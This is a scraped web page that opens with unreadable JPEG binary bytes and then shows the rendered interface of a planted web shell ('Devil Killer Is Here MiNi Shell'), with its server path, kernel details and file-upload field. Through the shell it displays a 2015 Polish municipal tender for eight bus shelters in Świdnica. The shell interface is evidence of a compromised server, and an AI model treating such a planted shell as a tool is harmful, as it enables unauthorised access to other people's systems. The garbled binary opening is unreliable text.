JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150918/244522-N-2015.html

<p class="kh_header"><b>Świdnica: Dostawa i montaż wiat przystankowych</b><br>
<b>Numer ogłoszenia: 244522 - 2015; data zamieszczenia: 18.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Świdnicy , ul. Armii Krajowej 49, 58-100 Świdnica, woj. dolnośląskie, tel. 074 8562850, faks 074 8523110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.swidnica.bip-gov.info.pl/bip/glowna</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż wiat przystankowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje zakup, dostawę i montaż w określonych przez zamawiającego lokalizacjach, 
8 sztuk wiat przystankowych. Montaż obejmuje również wszelkie niezbędne prace związane z dopro-wadzeniem do stanu używalności miejsc montażu, w tym uprzątnięcie terenu oraz obróbkę nawierzch-ni chodnika. Zamówienie nie obejmuje demontażu i utylizacji istniejących wiat.

3.5  Parametry wiat przystankowych:

3.5.1.  Wymagania szczegółowe dotyczące wiat w poszczególnych lokalizacjach
	
1.	pl. Grunwaldzki-kiosk - wiata typu A - 12 modułowa  - długość przy podstawie16500 do 17500 mm, szerokość przy podstawie 1350 do 1400 mm, wysokość do linii dachu 2400 do 2500 mm, 2 gabloty (1200 x 1800 mm - format widoczny) podświetlane  jednostronne na tylnej ścianie (pierwsza na drugiej ścianie od strony najazdowej, druga na przedostatniej ścianie od strony wy-jazdowej), 2 tablice rozkładowe (700 x 1000 mm - format widoczny) zamykane na klucz (w czę-ści centralnej wiaty) jednostronne, podświetlane. Po stronie najazdowej biletomat. 
Ilość sztuk wiat - 1 

2.	 pl. Grunwaldzki-Jonatan - wiata typu B - 12 modułowa - długość przy podstawie16500 do 17500 mm, szerokość przy podstawie 1350 do 1400 mm, wysokość do linii dachu 2400 do 2500 mm, 2 gabloty (1200 x 1800 mm - format widoczny) podświetlane dwustronne na tylnej ścianie wiaty (pierwsza na drugiej ścianie od strony najazdowej, druga na przedostatniej ścianie od strony wyjazdowej), 2 tablice rozkładowe (700 x 1000 mm - format widoczny) zamykane na klucz (w części centralnej wiaty) jednostronne, podświetlane. 
Ilość sztuk wiat - 1
3.	ul. Zamenhofa-Urząd Skarbowy - wiata typu C 4 modułowa - długość przy podstawie 5250 do 5350 mm, szerokość przy podstawie 1350 do 1400 mm, wysokość do linii dachu 2400 do 2500 mm, od strony wyjazdowej wiatrołap (1 moduł), 1 aluminiowa tablica rozkładowa w formacie A2 (w części centralnej wiaty). 
Ilość sztuk wiat - 1

4.	ul. Zamenhofa-Shell - wiata typu D 4 modułowa - długość przy podstawie 5250 do 5350 mm, szerokość przy podstawie 1350 do 1400 mm, wysokość do linii dachu 2400 do 2500 mm, od stro-ny najazdowej wiatrołap (1 moduł), 1 aluminiowa tablica rozkładowa w formacie A3 (w części centralnej wiaty).            
Ilość sztuk wiat - 1.

5.	al. Niepodległości - wiata typu E 4 modułowa -długość przy podstawie 5250 do 5350 mm, szerokość przy podstawie 1350 do 1400 mm, wysokość do linii dachu 2400 do 2500 mm, 1 gablo-ta (1200 x 1800 mm - format widoczny) podświetlana dwustronna na wyjeździe, 2 aluminiowe tablice rozkładowe (700 x 1000 mm - format widoczny) zamykana na klucz (w części centralnej wiaty). 
Ilość sztuk wiat - 1.

6.	ul. Stefana Wyszyńskiego-okrąglak - wiata typu F 3 modułowa, długość przy podstawie 3950 do 4050 mm, szerokość przy podstawie 1350 do 1400 mm, wysokość do linii dachu 2400 do 2500 mm, 1 aluminiowa tablica rozkładowa w formacie A2 (w części centralnej wiaty). 
Ilość sztuk wiat - 1.

7.	ul. Sikorskiego-pętla - wiata typu G 3 modułowa - długość przy podstawie 3950 do 4050 mm, szerokość przy podstawie 1350 do 1400 mm, wysokość do linii dachu 2400 do 2500 mm, 1 alu-miniowa tablica rozkładowa w formacie A3 (w części centralnej wiaty).
Ilość sztuk wiat - 1.

8.	ul. E. Plater - wiata typu H - 5 modułowa - długość przy podstawie 5700 do 6800 mm, szero-kość przy podstawie 1350 do 1400 mm, wysokość do linii dachu 2400 do 2500 mm, 1 gablota dwustronna podświetlana na wyjeździe (1200 x 1800 mm - format widoczny), 1 tablica rozkłado-wa zamykana na klucz o wymiarach (700 x 1000 mm - format widoczny) zamykane na klucz (w części centralnej wiaty) jednostronna, podświetlana, 1 aluminiowa tablica rozkładowa w formacie A2 (obie w części centralnej wiaty. Po stronie najazdowej biletomat.
Ilość sztuk wiat - 1.   

3.5.2	Pozostałe wymagania dotyczące wszystkich wiat

1)	konstrukcja wiaty: słupki aluminiowe o wymiarach zewnętrznych min. 90x90 mm z wewnętrznym żebrowaniem. W każdym słupku listwy samozatrzaskowe mocujące szybę do konstrukcji wiaty. Nie zezwala się na stosowanie śrub, nitów lub wkrętów do mocowania szyb. Konstrukcja spięta górą i dołem za pomocą prostokątnego profilu aluminiowego min. 40x90 mm. Konstrukcja malo-wana proszkowo w kolorze RAL 9006,
2)	pod dachem wiaty zamontowana listwa o wysokości min. 140 mm malowana proszkowo w kolorze RAL 3000 przeznaczona do umieszczenia na niej nazwy przystanku wraz z numerami linii autobu-sowych. Nie dopuszcza się montowania listwy w miejscu, w którym mogłaby przesłaniać łuk da-chu tj. na rynnie lub ponad rynną.
3)	dach: wykonany w całości z profili aluminiowych. Konstrukcja główna z dwóch aluminiowych be-lek dachowych (przednia i tylna) i łuków w rozstawie co ok. 700mm. Belki dachowe oprócz funk-cji nośnych - konstrukcyjnych zawierają na krawędzi spływu, rynny poziome. Łuki dachowe alu-miniowe z profili min. 30x50x3 mm. Kształt dachu wypukły, promień łuku dachu R = 2400-2600 mm, pokryty nietłukącymi płytami poliwęglanu litego dymionego o grubości min. 4 mm, kon-strukcja dachu malowana proszkowo w kolorze RAL 9006.

4)	ściany wiaty: rozstaw słupków wszystkich ścian dostosowany do wymiaru szyb 1245 x 1920 mm. Szyby hartowane, bezpieczne grubość 8mm,
5)	fundamenty z prefabrykowanych fundamentów punktowych pod każdym słupkiem (z betonu B25 w postaci prefabrykowanych fundamentów punktowych 400 x 400 mm),
6)	wyposażenie wiaty przystankowej: 
-	ławka o na całej długości wiaty za wyjątkiem modułów z gablotami reklamowymi B1  na ścianie bocznej lub tylnej wiaty oraz w przypadku zamontowania biletomatu, z siedziskiem z drewna. Siedzisko na wspornikach przykręcanych do konstrukcji wiaty. Całość ocynko-wana ogniowo i lakierowana na kolor RAL 9006.
-	kosz na śmieci z daszkiem, 1 szt. po stronie najazdowej przy wiatach do 5 modułów, 2 szt. na wiatach większych (po stronie najazdowej 1 szt. i wyjazdowej 1 szt.), z wkładem jako wiaderko o poj. 35 - 50 l, kolor kosza paleta RAL nr 9006.
-	znak przystanku D15 na wysięgniku
-	gablota reklamowa (1200 x 1800 mm - format widoczny) oraz tablica rozkładowa (700 x 1000 mm - format widoczny), wykonana z systemowych profili aluminiowych, lakierowa-nych proszkowo w kolorze RAL 9006, system profili wykończeniowych, łączników, uszczelek, zawiasów i zamków, skrzynka gabloty wykonana z trójkomorowego profilu z odpowiednimi przylgami i wypustami do mocowania uszczelek oraz tzw. ząbkami do ustalania położenia profili obudowy. Drzwi gabloty otwierane na bok, zamontowane są do ościeżnicy za pomocą specjalnych zawiasów wewnętrznych ze stali nierdzewnej. Standar-dowo każde drzwi muszą posiadać zamki na wklęsły klucz trójkątny pasujący do wszyst-kich zamków. Języka zamka nie można podważyć od strony zewnętrznej gabloty, drzwi w gablocie przeszklone szybą hartowaną o grubości min. 5 mm osadzone za pomocą uszcze-lek w aluminiowej ramce wykonanej z systemowych profili aluminiowych, systemowe uszczelki ościeżnicy muszą chronić wnętrze gabloty przed przedostawaniem się pyłów i wody, a otwory wentylacyjne zapobiegają parowaniu. Drzwi wyposażone w zabezpieczenie wykonane ze stali nierdzewnej, które chroni otwarte drzwi przed wyrywaniem przez po-dmuchy wiatru, gablota reklamowa wyposażona w matówkę z tworzywa PMMA rozprasza-jącego światło, grubości min. 4 mm, która służy jako tło dla eksponowanych plakatów i do rozproszenia światła, matówka zawieszana na uchwytach, które pozwalają na szybki jej demontaż (np. w celu wymiany świetlówki). Matówka z otworami umożliwiającymi wło-żenie dłoni. Na matówce zamontowane rolkowo-grawitacyjne uchwyty plakatu pozwalają-ce na wielokrotne, szybkie zawieszanie plakatu bez jego uszkodzenia. Uchwyty mają po-zwalać na wielokrotną wymianę plakatu/ogłoszeń oraz poprawienie jego położenia, we-wnętrzna instalacja elektryczna gabloty o napięciu 230V wraz z wyłącznikiem różnicowo-prądowym, służąca do podświetlenia skrzynki gabloty. Gablota musi być wyposażona w oświetlenie typu LED o mocy min. 18W rozmieszczone na: 2 pionowych wewnętrznych krawędziach ościeżnicy (dot. gabloty reklamowej) oraz jeden poziomy wewnętrzny na krawędziach ościeżnicy (dot. tablicy rozkładowej). W związku z tym musi posiadać świa-dectwo bezpieczeństwa CE oraz oznaczone znakiem bezpieczeństwa B, świadczące o speł-nieniu norm bezpieczeństwa w przypadku urządzeń niskonapięciowych stosowanych w miejscach publicznych, wystawione przez niezależny podmiot zajmujący się poświadcze-niem zgodności instalowanych gablot z aktualnymi normami.
7)	Siedziska drewniane lakierowane na długości wiaty umożliwiającej swobodne otwieranie gablot, stanowiące integralną część wiaty, krótsze o 1 moduł od strony wyjazdowej (miejsce na biletomat- poz. 1,3,11 wymagań szczegółowych, rozdz. I),
8)	wiaty montowane na fundamentach  punktowych. 
9)	dla potwierdzenia, że oferowane wiaty oraz gabloty spełniają wymagania określone przez Zama-wiającego, Wykonawca zobowiązany jest załączyć do oferty:
a) świadectwo bezpieczeństwa CE, 
b) znak bezpieczeństwa B, 
świadczące o spełnieniu norm bezpieczeństwa w przypadku urządzeń  niskonapięciowych stosowanych w miejscach publicznych, wystawione przez niezależny podmiot zajmujący się poświadczaniem zgodności instalowanych gablot z wymogami norm PN-EN 60598-1:2007 IDT EN 60598-1:2004,
c) karty katalogowe oferowanych wiat - wiaty winny być zwymiarowane dla sprawdzenia spełnienia warunków określonych w pkt 3.5.1 SIWZ (dodatkowo załączyć wymiarowanie fundamentów).
15) Wykonawca udzieli Zamawiającemu gwarancji:
-	60 m-cy  na korozję konstrukcji wiaty i koszy na odpady,
-	24 m-ce na powłokę malarską na stali ocynkowanej,
-	48 m-cy na powłokę malarską na aluminium,
-	24 m-ce na podzespoły elektryczne,
-	12 m-cy na montaż wiaty..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 44.21.23.21-5, 45.21.33.11-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: 8.000,00 zł (słownie: osiem tysięcy złotych).

11.2 Wadium winno zostać wniesione przed upływem terminu składania ofert, tj. przed 28.09.2015 r. przed godz. 09.00.

11.3 Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy Pzp z tym, że:
a ) złożone w pieniądzu: przelewem na rachunek bankowy Zamawiającego w Banku PKO. 
S.A I Oddział w Świdnicy 96 1240 1978 1111 0010 0166 5724. Kwota wadium wniesiona przelewem winna znaleźć się na rachunku bankowym zamawiającego przed upływem ter-minu składania ofert. 
b) złożone w gwarancjach (bankowych, ubezpieczeniowych): z treści gwarancji winno wynikać bezwarunkowo, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wa-dium w okolicznościach określonych w art. 46 ust. 5 ustawy Pzp tj. w przypadku gdy Wyko-nawca:
- odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
-  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżą-cych po stronie Wykonawcy, 
-  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust 1, pełnomocnictw, list podmio-tów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub in-formacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej,
c) złożone w innej niż pieniądz formie winno być złożone w kasie Zamawiającego jako depozyt, złożony za potwierdzeniem , przed upływem terminu składania ofert.
d) w przypadku złożenia wadium w formie innej niż pieniądz, dokument gwarancji/poręczenia wadialnego winien pod rygorem odrzucenia oferty wskazywać wszystkie podmioty wspólnie ubiegające się o udzielenie zamówienia w rozumieniu art.23 ustawy Pzp. 

11.4. Dowód przelewu lub potwierdzenie złożenia depozytu należy dołączyć w oryginale do oferty.

11.5. Wszystkie formy wadium powinny mieć określoną ważność zgodną z okresem związania ofertą. Bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert.

11.6. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najko-rzystniejszej lub unieważnieniu postępowania z wyjątkiem Wykonawcy, którego oferta została wybra-na jako najkorzystniejsza, z zastrzeżeniem jak w punkcie 11.8.

11.7  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wa-dium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego. 

11.8  Zamawiający zwraca wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.

11.9  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a) odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofer-cie,
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
c)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
d) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwa-nie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust 1, pełnomocnictw, list podmiotów należących do tej sa-mej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniej-szej,</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie wykonał lub wykonuje zamówienia polegające na dostawie i montażu wiat przystankowych o wartości łącznej nie mniejszej niż  200 000 zł brutto,  w tym jedno zamówienie na kwotę minimum 100 000 zł brutto</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że będzie dysponował co najmniej jedną osobą odpowiedzialną za realizację dostawy i montażu wiat przystankowych, z co najmniej dwuletnim doświadczeniem zawodowym, która będzie uczestniczyć w realizacji zamówienia i w szczególności odpowiedzialna będzie za orga-nizację dostaw i nadzorowanie montażu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada środki finansowe lub zdolność kredytową w wysokości mini-mum 150 000 zł (sto pięćdziesiąt tysięcy złotych) oraz, że posiada ubezpieczenie od odpowiedzialno-ści cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 100 000 zł (sto tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie wykonał lub wykonuje zamówienia polegające na dostawie i montażu wiat przystankowych o wartości łącznej nie mniejszej niż  200 000 zł brutto,  w tym jedno zamówienie na kwotę minimum 100 000 zł brutto.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">inne dokumenty dotyczące sytuacji ekonomicznej i finansowej:<br>Jeżeli Wykonawca będzie polegał na zdolności ekonomiczno - finansowej podmiotów trzecich, do oferty należy dołączyć oświadczenie o solidarnej odpowiedzialności za realizację zadania Wykonawcy i tych podmiotów (art. 369 k.c.).;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

